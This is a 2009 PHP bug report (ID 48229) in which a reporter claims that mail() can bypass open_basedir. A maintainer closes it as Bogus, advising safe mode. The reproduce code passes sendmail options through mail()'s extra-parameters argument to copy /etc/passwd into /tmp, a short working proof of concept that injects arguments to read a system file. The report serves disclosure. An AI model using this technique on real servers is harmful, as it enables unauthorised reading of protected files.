ID: 48229 Updated by: j...@php.net Reported By: root at 80sec dot com -Status: Open +Status: Bogus Bug Type: Safe Mode/open_basedir Operating System: linux PHP Version: 5.2.9 New Comment:
Enable safe-mode. Previous Comments: ------------------------------------------------------------------------ [2009-05-11 02:35:50] root at 80sec dot com Description: ------------ The mail function may bypass open_basedir or read/write arbitrary file. Reproduce code: --------------- <?php $to = 'jian...@80sec.com'.str_repeat("x",10000); $subject = 'the subject'.str_repeat("x",10); $message = 'hello'.str_repeat("x",10); mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd"); ?> Expected result: ---------------- we can get the contents of /etc/passwd in /tmp/80sec. Actual result: -------------- we can get the contents of /etc/passwd in /tmp/80sec. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=48229&edit=1